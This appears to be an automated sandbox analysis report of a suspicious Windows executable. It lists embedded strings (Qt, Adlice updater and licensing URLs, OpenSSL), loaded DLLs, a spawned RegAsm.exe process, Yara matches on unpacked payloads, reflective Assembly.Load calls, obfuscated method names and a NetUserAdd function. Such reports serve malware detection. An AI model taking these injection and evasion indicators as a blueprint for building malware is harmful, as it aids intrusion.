                    Source: WyPb2uVZ1P.exe | String found in binary or memory: QToolTipclassstyle1styleDestroyed(QObject*)Could not parse application stylesheetstyleSheet* {Could not parse stylesheet of object %pQDockWidgetTitleButtonqt_dockwidget_closebuttonqt_dockwidget_floatbutton_q_stylesheet_minw_q_stylesheet_minh_q_stylesheet_maxw_q_stylesheet_maxh does not have a property named cannot design property named _q_styleSheetWidgetFont1objectDestroyed(QObject*)mNXicon-sizetitlebar-menu-icontitlebar-minimize-icontitlebar-maximize-icontitlebar-close-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontitlebar-contexthelp-icondockwidget-close-iconmessagebox-information-iconmessagebox-warning-iconmessagebox-critical-iconmessagebox-question-icondesktop-icontrash-iconcomputer-iconfloppy-iconharddisk-iconcd-icondvd-iconnetwork-icondirectory-open-icondirectory-closed-icondirectory-link-iconfile-iconfile-link-iconfiledialog-start-iconfiledialog-end-iconfiledialog-parent-directory-iconfiledialog-new-directory-iconfiledialog-detailedview-iconfiledialog-infoview-iconfiledialog-contentsview-iconfiledialog-listview-iconfiledialog-backward-icondirectory-icondialog-ok-icondialog-cancel-icondialog-help-icondialog-open-icondialog-save-icondialog-close-icondialog-apply-icondialog-reset-icondiscard-icondialog-yes-icondialog-no-iconuparrow-icondownarrow-iconleftarrow-iconrightarrow-iconbackward-iconforward-iconhome-iconlineedit-password-characterlineedit-password-mask-delaydither-disabled-textetch-disabled-textactivate-on-singleclickshow-decoration-selectedgridline-coloropacitycombobox-popupcombobox-list-mousetrackingmenubar-altkey-navigationmenu-scrollablemenubar-separatormouse-trackingspinbox-click-autorepeat-ratespincontrol-disable-on-boundsmessagebox-text-interaction-flagstoolbutton-popup-delayscrollview-frame-around-contentsscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controltabbar-elide-modetabbar-prefer-no-arrowsdialogbuttonbox-buttons-have-iconsmdi-fill-space-on-maximizearrow-keys-navigate-into-childrenpaint-alternating-row-colors-for-empty-areaqt_fontDialog_sampleEditqt_
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: Gstandardbutton-help-32.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: standardbutton-help-128.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: media-stop-16.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: media-stop-32.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: Gstandardbutton-help-16.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: process-stop
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: media-playback-start
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: media-playback-stop
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-24.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-32.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-32.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-16.png
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: <!--StartFragment-->
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: text-decoration: underline overline line-through color: background-color: vertical-align:middletopbottom text-transform:uppercase; text-transform:lowercase; font-variant:small-caps; word-spacing:%" align="right" align="center" align="justify" style="float: float: left; right; border-style:dotteddashedsoliddot-dashdot-dot-dashgrooveridgeinsetoutset page-break-before:always; page-break-after:always; font-family:&quot; margin-top: margin-bottom: margin-left: margin-right:<a name=""></a><a href=""><span style="<imgsrcwidthheight style="vertical-align: middle;" style="vertical-align: top;" />[\na]<br /></span></a> dir='rtl'-qt-paragraph-type:empty; -qt-block-indent: text-indent: -qt-user-state: line-height: min-height: line-spacing:%;<ol<ul<ul type="circle"<ul type="square"<ol type="a"<ol type="A"<ol type="i"<ol type="I"margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; -qt-list-indent: \22\27 -qt-list-number-prefix: -qt-list-number-suffix: <li<hr/><pre<p<!--StartFragment--><!--EndFragment--></pre></li></ol></ul>bgcolor
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: tab-stops
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: tab-stop
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: mimetypeurn:oasis:names:tc:opendocument:xmlns:manifest:1.0manifest1.2version/text/xmlcontent.xmlMETA-INF/manifest.xmlfile-entrymedia-typefull-pathtable-columnnumber-columns-repeatedtable-rowtable-cellnumber-columns-spannednumber-rows-spannedT%1style-namelist-itemlistL%1pp%1spanc%1line-breaktabimageautomatic-stylesparagraphfamilyparagraph-propertiesstartQTextOdfWriter: unsupported paragraph alignment; margin-topmargin-bottommargin-leftmargin-righttext-indentbreak-beforebreak-afterkeep-togethertab-stopstab-stoppositiontext-propertiesSanstext-transformuppercaselowercasecapitalizesmall-capsfont-variantletter-spacingword-spacingsingletext-line-through-typetext-underline-colordashdash-dotwave0%-100%text-outlinelist-level-style-numbernum-formatnum-suffixnum-prefixlist-level-style-bulletbullet-charlevellist-level-properties%1mmspace-befores%1section-propertiestable-propertiespaddingpadding-toppadding-bottompadding-leftpadding-rightautomaticurn:oasis:names:tc:opendocument:xmlns:office:1.0urn:oasis:names:tc:opendocument:xmlns:text:1.0urn:oasis:names:tc:opendocument:xmlns:style:1.0urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0urn:oasis:names:tc:opendocument:xmlns:table:1.0urn:oasis:names:tc:opendocument:xmlns:drawing:1.0http://www.w3.org/1999/xlinkurn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0QTextOdfWriter::writeAll: the device can not be opened for writingofficefodrawxlinkdocument-contentbody
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: [Updater::LaunchUpdate::Client] Starting software update (%ls, %ls), restart = %d -params " -restartx64x86 -arch " -update_target " -product "; -allowed_types "-install_path "Updater.exe[Updater::StartUpdate::Server] Unable to download target (%ls)[Updater::StartUpdate::Server] Terminating existing process (%ls:%lu)/silent /norestart /forcecloseapplications[Updater::StartUpdate::Server] Starting installer (%ls), success = %d[Updater::StartUpdate::Server] Replaced target with updated binary (%ls)[Updater::StartUpdate::Server] Unable to replace target with updated binary (%ls), %luhttps://download.adlice.com/api?action=download&app=%ls&type=setuphttps://download.adlice.com/api?action=download&app=%ls&type=portable_x64https://download.adlice.com/api?action=download&app=%ls&type=portable_x86https://licensing.adlice.com/api/v1/index.php/config/licensing/expiration_date/config/licensing/typeTRIAL_TECH[Licensing::GetRequest] Obtaining license state for id,%ls | machine,%ls...idkeyinstanceplatform 64 bits 32 bitsyes?action=check[Licensing::GetRequest] Unable to get response from server?action=getinstances[Licensing::GetActivations] Unable to get response from server?action=removeinstance[Licensing::DeactivateInstanceRequest] Properly removed instance,%ls[Licensing::DeactivateInstanceRequest] Unable to get response from serverisvalidactivation_timeexpiration_timeerror_msgerror_codeinstances_remaininginstances_maxlicense_emailproduct_idexpired[Licensing::ActivateTrial] Trial activated[Licensing::ActivateTrial] Unable to activate trial, already used[Licensing::DeactivateTrial] Trial deactivated, will not be available anymore[Licensing::DeactivateTrial] Unable to deactivate trial, not used yet[Licensing::Remove] Properly removed license[Licensing::CheckLicense] No license found, missing info[Licensing::CheckLicense] Trial found[Licensing::CheckLicense] Unable to contact server, using internal information : date,expired%04d-%02d-%02d %02d:%02d:%02d[Licensing::CheckLicense] Unable to contact the server[Licensing::CheckLicense] No more activations[Licensing::CheckLicense] License key is expired (%ls)[Licensing::CheckLicense] Invalid key or id[Licensing::CheckLicense] License key is about to expire (%ls)[Licensing::CheckLicense] License is for wrong productinstancescreatedactivation_platformhttps://download.adlice.com/api/?action=read&app=%ls&type=available_version[VersionManager::Software::CheckIfOutdated] Software is outdated (%ls => %ls)[VersionManager::Software::CheckIfOutdated] Software up to date (%ls)[VersionManager::Software::CheckIfOutdated] DNS error while checking version, flushing DNS cache...1kXnBBX6SEXgvOVhttps://stats.adlice.comROGUEKILLER_TECHUCHECK_TECHDIAG_TECHDIFFVIEW[Telemetry::Send] Sending telemetry dataoperating_system64 bits32 bitsbitstrialtechnicianpremium_versionpersonalDATA%s/api.php?action=submit&application=%s{"Error":"Posted data"}[Telemetry::Send] Unable to send telemetry data[Telemetry::SendRTP] Sending RTP telemetry data[Telemetr
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: set-addPolicy
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: id-cmc-addExtensions
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectoryt
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: Unable to complete request for channel-process-startup
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: in-addr.arpa
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: edu.bsflog.bredu.btonjuku.chiba.jpotoyo.kochi.jpbenevento.itedu.ciin-addr.arpaedu.bzart.brhistory.museumbrothermed.ecmeteorapp.comagr.bredu.cnmed.eenaka.hiroshima.jpkamimine.saga.jpedu.corishiri.hokkaido.jpedu.cushinjo.nara.jpnesset.noedu.cwclick
                    Source: WyPb2uVZ1P.exe | String found in binary or memory: Africa/Addis_Ababa
                    Source: unknown | Process created: C:\Users\user\Desktop\WyPb2uVZ1P.exe "C:\Users\user\Desktop\WyPb2uVZ1P.exe"
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: pdh.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: netapi32.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: userenv.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: uxtheme.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: wtsapi32.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: winmm.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: samcli.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: netutils.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: wininet.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: mscoree.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: amsi.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: wldp.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: windows.storage.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wininet.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: webio.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: WyPb2uVZ1P.exe | Static file information: File size 16933008 > 1048576
                    Source: WyPb2uVZ1P.exe | Static PE information: Raw size of .reloc is bigger than: 0x100000 < 0x2a4400
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: WyPb2uVZ1P.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Source: WyPb2uVZ1P.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: E:\Adlice\UpdateChecker\RelWithDebInfo\updater.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: 2C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501 source: WyPb2uVZ1P.exe
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2370757567.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000004C28000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\VisualStudio\Projects\RebootExec\Release\RebootExec.pdb source: WyPb2uVZ1P.exe
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: WyPb2uVZ1P.exe, 00000000.00000002.2370531338.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, WyPb2uVZ1P.exe, 00000000.00000002.2366742842.0000000005684000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: _CHAR__ANY__RANGE__CLASS__WORD_CHAR__NON_WORD_CHAR__SPACE__NON_SPACE__DIGIT__NON_DIGIT__WORD_BOUNDARY__NON_WORD_BOUNDARY_'*''?''+''^''$''.'realternativeconcatenationcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 /WX -DL_ENDIAN -DOPENSSL_PIC -D_WIN32_WINNT=0x0501Load file into cachecrypto\x509\by_file.cunspecified certificate verification errorunable to get issuer certificateunable to get certificate CRLunable to decrypt certificate's signatureunable to decrypt CRL's signatureunable to decode issuer public keycertificate signature failureCRL signature failurecertificate is not yet validcertificate has expiredCRL is not yet validCRL has expiredformat error in certificate's notBefore fieldformat error in certificate's notAfter fieldformat error in CRL's lastUpdate fieldformat error in CRL's nextUpdate fieldself signed certificateself signed certificate in certificate chainunable to get local issuer certificateunable to verify the first certificatecertificate chain too longcertificate revokedinvalid CA certificatepath length constraint exceededunsupported certificate purposecertificate not trustedcertificate rejectedsubject issuer mismatchauthority and subject key identifier mismatchauthority and issuer serial number mismatchkey usage does not include certificate signingunable to get CRL issuer certificateunhandled critical extensionkey usage does not include CRL signingunhandled critical CRL extensioninvalid non-CA certificate (has CA markings)proxy path length constraint exceededkey usage does not include digital signatureproxy certificates not allowed, please set the appropriate flaginvalid or inconsistent certificate extensioninvalid or inconsistent certificate policy extensionno explicit policyDifferent CRL scopeUnsupported extension featureRFC 3779 resource not subset of parent's resourcespermitted subtree violationexcluded subtree violationname constraints minimum and maximum not supportedapplication verification failureunsupported name constraint typeunsupported or invalid name constraint syntaxunsupported or invalid name syntaxCRL path validation errorPath LoopSuite B: certificate version invalidSuite B: invalid public key algorithmSuite B: invalid ECC curveSuite B: invalid signature algorithmSuite B: curve not allowed for this LOSSuite B: cannot sign P-384 with P-256Hostname mismatchEmail address mismatchIP address mismatchNo matching DANE TLSA recordsEE certificate key too weakCA certificate key too weakCA signature digest algorithm too weakInvalid certificate verification contextIssuer certificate lookup errorCertificate Transparency required, but no valid SCTs foundproxy subject name violationOCSP verification neededOCSP verification failedOCSP unknown certunknown certificate verification errorcrypto\rand\randfile.cFilename=RANDFILEHOMEUSERPROFILESYSTEMROOT.rndcrypto\ocsp\ocsp_cl.ch7. source: WyPb2uVZ1P.exe
                    Source: WyPb2uVZ1P.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: WyPb2uVZ1P.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: WyPb2uVZ1P.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: WyPb2uVZ1P.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: WyPb2uVZ1P.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, ListDecorator.cs | .Net Code: Read
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.56842b8.11.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeModel.cs | .Net Code: TryDeserializeList
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, ListDecorator.cs | .Net Code: Read
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs | .Net Code: CreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateInstance
                    Source: 0.2.WyPb2uVZ1P.exe.6b40000.18.raw.unpack, TypeSerializer.cs | .Net Code: EmitCreateIfNull
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, -.cs | .Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.WyPb2uVZ1P.exe.6380000.14.raw.unpack, Rvdoqpqjgq.cs | .Net Code: Pmxfrmbm System.AppDomain.Load(byte[])
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, ReflectionHelper.cs | .Net Code: InvokeMethod
                    Source: 0.2.WyPb2uVZ1P.exe.6ca0000.19.raw.unpack, XmlSerializationHelper.cs | .Net Code: ReadObjectProperties
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.558b478.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.6a40000.17.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.6a40000.17.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.558b478.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.4f91c2c.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.4ec57b8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.4f71c0c.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.543b858.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.WyPb2uVZ1P.exe.52ebc38.10.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000002.2370106119.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2353904909.0000000003C21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2366742842.0000000004E2B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.2366742842.000000000519C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: WyPb2uVZ1P.exe PID: 984, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00AE7E80 FreeLibrary,LoadLibraryW,GetProcAddress, 0_2_00AE7E80
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_0310736A push es; ret 0_2_03107384
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_073843FC push esi; iretd 0_2_07384407
                    Source: 0.2.WyPb2uVZ1P.exe.6620000.15.raw.unpack, tJvkfOA65gBtA6Umufm.cs | High entropy of concatenated method names: 'C9yALMhHIL', 'SrcAKqNHDs', 'Y8RAvbq8Ym', 'PDNAuImV7m', 'kWvA5lL3iE', 'l7EAo31GYo', 'dAeA1L7Oyc', 'bM3AkTL1Bn', 'c7mAi0TB7E', 'OAUApWmL12'
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exe | Code function: 0_2_00ABB880 NetUserAdd,NetUserSetInfo,NetUserSetInfo,LogonUserW,LoadUserProfileW,UnloadUserProfile,NetUserSetInfo,FreeLibrary, 0_2_00ABB880
                    Source: WyPb2uVZ1P.exe | Binary or memory string: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 